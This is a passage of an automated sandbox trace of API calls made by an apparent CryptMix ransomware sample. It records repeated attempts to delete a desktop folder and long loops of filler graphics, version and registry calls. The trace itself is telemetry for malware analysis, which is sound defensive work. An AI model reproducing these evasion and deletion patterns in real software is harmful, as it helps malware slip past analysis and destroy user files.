[0017.361] wsprintfA (in: param_1=0x18dcb8, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0017.361] SHFileOperationA (in: lpFileOp=0x18f5b4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x20220000) | out: lpFileOp=0x18f5b4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x20220000)) returned 2 [0017.363] GetDC (hWnd=0x0) returned 0x2801071f [0017.364] CreateCompatibleDC (hdc=0x2801071f) returned 0x1701071a [0017.364] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ef08 | out: piconinfo=0x18ef08) returned 0 [0017.364] GetDC (hWnd=0x0) returned 0x42010807 [0017.364] CreateCompatibleDC (hdc=0x42010807) returned 0x18010806 [0017.364] GetIconInfo (in: hIcon=0x0, piconinfo=0x18efe4 | out: piconinfo=0x18efe4) returned 0 [0017.364] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0017.364] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18dab0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0017.365] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0017.365] wsprintfA (in: param_1=0x18dab0, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0017.365] SHFileOperationA (in: lpFileOp=0x18f574*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x550000) | out: lpFileOp=0x18f574*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x550000)) returned 2 [0017.369] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0017.369] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18a564, lpFilePart=0x18180c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x18180c*="Desktop") returned 0x25 [0017.369] SetFileAttributesW (lpFileName="ݯ眀", dwFileAttributes=0x20) returned 0 [0017.369] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0017.369] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18d8a8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0017.369] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0017.369] wsprintfA (in: param_1=0x18d8a8, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0017.369] SHFileOperationA (in: lpFileOp=0x18f534*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x550000) | out: lpFileOp=0x18f534*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x550000)) returned 2 [0017.373] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0017.373] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18a360, lpFilePart=0x18180c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x18180c*="Desktop") returned 0x25 [0017.373] GetDC (hWnd=0x0) returned 0x290107c8 [0017.374] CreateCompatibleDC (hdc=0x290107c8) returned 0x4a0107e9 [0017.374] GetIconInfo (in: hIcon=0x0, piconinfo=0x18efa8 | out: piconinfo=0x18efa8) returned 0 [0017.374] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0017.374] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18d6a0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0017.374] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0017.374] wsprintfA (in: param_1=0x18d6a0, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0017.374] SHFileOperationA (in: lpFileOp=0x18f4f4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="") | out: lpFileOp=0x18f4f4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="")) returned 2 [0017.379] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0017.379] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18a15c, lpFilePart=0x18180c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x18180c*="Desktop") returned 0x25 [0017.379] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815d8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0017.379] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x189f54, lpFilePart=0x1817f4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1817f4*="Desktop") returned 0x25 [0017.379] GetDC (hWnd=0x0) returned 0x210107fe [0017.379] CreateCompatibleDC (hdc=0x210107fe) returned 0x2301081a [0017.379] GetIconInfo (in: hIcon=0x0, piconinfo=0x18eff8 | out: piconinfo=0x18eff8) returned 0 [0017.379] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0017.380] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815e4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0017.380] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x189d50, lpFilePart=0x181800 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x181800*="Desktop") returned 0x25 [0017.380] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18d7a4, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0017.380] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0017.380] wsprintfA (in: param_1=0x18d7a4, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0017.380] SHFileOperationA (in: lpFileOp=0x18f614*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xc50000) | out: lpFileOp=0x18f614*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xc50000)) returned 2 [0017.384] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815d8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0017.384] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x189b4c, lpFilePart=0x1817f4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1817f4*="Desktop") returned 0x25 [0017.384] GetDC (hWnd=0x0) returned 0x13010813 [0017.384] CreateCompatibleDC (hdc=0x13010813) returned 0x52010809 [0017.385] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ef44 | out: piconinfo=0x18ef44) returned 0 [0017.385] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0017.385] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x189948, lpFilePart=0x18180c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x18180c*="Desktop") returned 0x25 [0017.385] GetDC (hWnd=0x0) returned 0xa010808 [0017.385] CreateCompatibleDC (hdc=0xa010808) returned 0x26010267 [0017.385] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ef1c | out: piconinfo=0x18ef1c) returned 0 [0017.385] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0017.385] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x189744, lpFilePart=0x18180c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x18180c*="Desktop") returned 0x25 [0017.385] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0017.385] CreateWindowExA (dwExStyle=0x0, lpClassName="BUTTON", lpWindowName="Press", dwStyle=0x80000001, X=100, Y=100, nWidth=300, nHeight=300, hWndParent=0x0, hMenu=0x0, hInstance=0x55820000, lpParam=0x0) returned 0x401c0 [0017.390] ImmGetVirtualKey () returned 0xe5 [0017.390] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x82040713 [0017.390] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7804027d [0017.390] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x204085b [0017.390] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x204085c [0017.390] CombineRgn (hrgnDst=0x204085b, hrgnSrc1=0x82040713, hrgnSrc2=0x7804027d, iMode=1) returned 1 [0017.390] CombineRgn (hrgnDst=0x204085c, hrgnSrc1=0x82040713, hrgnSrc2=0x7804027d, iMode=4) returned 2 [0017.390] CreateSolidBrush (color=0xff) returned 0x3100859 [0017.391] CreateSolidBrush (color=0xff0000) returned 0x310085a [0017.391] DeleteObject (ho=0x310085a) returned 1 [0017.391] DeleteObject (ho=0x7804027d) returned 1 [0017.391] DeleteObject (ho=0x82040713) returned 1 [0017.391] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.391] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.391] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.391] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.392] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.392] BeginPath (hdc=0x0) returned 0 [0017.392] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.392] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.392] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.392] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.392] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.392] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.393] VirtualQuery (in: lpAddress=0x5583ef18, lpBuffer=0x180cd0, dwLength=0x1c | out: lpBuffer=0x180cd0*(BaseAddress=0x5583e000, AllocationBase=0x55820000, AllocationProtect=0x80, RegionSize=0x3000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0017.393] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.393] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.394] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7904027d [0017.394] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x83040713 [0017.394] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x404082e [0017.394] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x36040720 [0017.394] CombineRgn (hrgnDst=0x404082e, hrgnSrc1=0x7904027d, hrgnSrc2=0x83040713, iMode=1) returned 1 [0017.394] CombineRgn (hrgnDst=0x36040720, hrgnSrc1=0x7904027d, hrgnSrc2=0x83040713, iMode=4) returned 2 [0017.394] CreateSolidBrush (color=0xff) returned 0x410085a [0017.394] CreateSolidBrush (color=0xff0000) returned 0x310082f [0017.394] DeleteObject (ho=0x310082f) returned 1 [0017.394] DeleteObject (ho=0x83040713) returned 1 [0017.394] DeleteObject (ho=0x7904027d) returned 1 [0017.394] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.394] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.394] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.394] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.394] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.394] BeginPath (hdc=0x0) returned 0 [0017.394] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.394] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.394] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.394] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.394] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.394] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.395] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.395] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.395] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x84040713 [0017.395] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7a04027d [0017.395] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0xe04082c [0017.395] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x2604027b [0017.395] CombineRgn (hrgnDst=0xe04082c, hrgnSrc1=0x84040713, hrgnSrc2=0x7a04027d, iMode=1) returned 1 [0017.395] CombineRgn (hrgnDst=0x2604027b, hrgnSrc1=0x84040713, hrgnSrc2=0x7a04027d, iMode=4) returned 2 [0017.395] CreateSolidBrush (color=0xff) returned 0x410082f [0017.395] CreateSolidBrush (color=0xff0000) returned 0x1e100723 [0017.395] DeleteObject (ho=0x1e100723) returned 1 [0017.395] DeleteObject (ho=0x7a04027d) returned 1 [0017.395] DeleteObject (ho=0x84040713) returned 1 [0017.395] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.395] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.395] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.395] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.395] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.396] BeginPath (hdc=0x0) returned 0 [0017.396] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.396] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.396] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.396] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.396] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.396] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.396] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.396] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.396] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7b04027d [0017.396] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x85040713 [0017.396] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x8040830 [0017.396] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x604082d [0017.396] CombineRgn (hrgnDst=0x8040830, hrgnSrc1=0x7b04027d, hrgnSrc2=0x85040713, iMode=1) returned 1 [0017.396] CombineRgn (hrgnDst=0x604082d, hrgnSrc1=0x7b04027d, hrgnSrc2=0x85040713, iMode=4) returned 2 [0017.396] CreateSolidBrush (color=0xff) returned 0x1f100723 [0017.396] CreateSolidBrush (color=0xff0000) returned 0x3f100811 [0017.396] DeleteObject (ho=0x3f100811) returned 1 [0017.396] DeleteObject (ho=0x85040713) returned 1 [0017.396] DeleteObject (ho=0x7b04027d) returned 1 [0017.396] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.396] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.397] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.397] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.397] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.397] BeginPath (hdc=0x0) returned 0 [0017.397] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.397] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.397] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.397] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.397] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.397] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.397] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.397] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.397] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x86040713 [0017.397] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7c04027d [0017.397] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0xe04081f [0017.397] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x11040823 [0017.397] CombineRgn (hrgnDst=0xe04081f, hrgnSrc1=0x86040713, hrgnSrc2=0x7c04027d, iMode=1) returned 1 [0017.397] CombineRgn (hrgnDst=0x11040823, hrgnSrc1=0x86040713, hrgnSrc2=0x7c04027d, iMode=4) returned 2 [0017.397] CreateSolidBrush (color=0xff) returned 0x40100811 [0017.397] CreateSolidBrush (color=0xff0000) returned 0x1d100714 [0017.397] DeleteObject (ho=0x1d100714) returned 1 [0017.398] DeleteObject (ho=0x7c04027d) returned 1 [0017.398] DeleteObject (ho=0x86040713) returned 1 [0017.398] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.398] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.398] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.398] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.398] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.398] BeginPath (hdc=0x0) returned 0 [0017.398] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.398] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.398] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.398] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.398] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.398] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.398] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.398] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.398] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7d04027d [0017.398] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x87040713 [0017.398] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x2f04085f [0017.398] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0xd040860 [0017.398] CombineRgn (hrgnDst=0x2f04085f, hrgnSrc1=0x7d04027d, hrgnSrc2=0x87040713, iMode=1) returned 1 [0017.399] CombineRgn (hrgnDst=0xd040860, hrgnSrc1=0x7d04027d, hrgnSrc2=0x87040713, iMode=4) returned 2 [0017.399] CreateSolidBrush (color=0xff) returned 0x1e100714 [0017.399] CreateSolidBrush (color=0xff0000) returned 0x810085d [0017.399] DeleteObject (ho=0x810085d) returned 1 [0017.399] DeleteObject (ho=0x87040713) returned 1 [0017.399] DeleteObject (ho=0x7d04027d) returned 1 [0017.399] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.399] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, 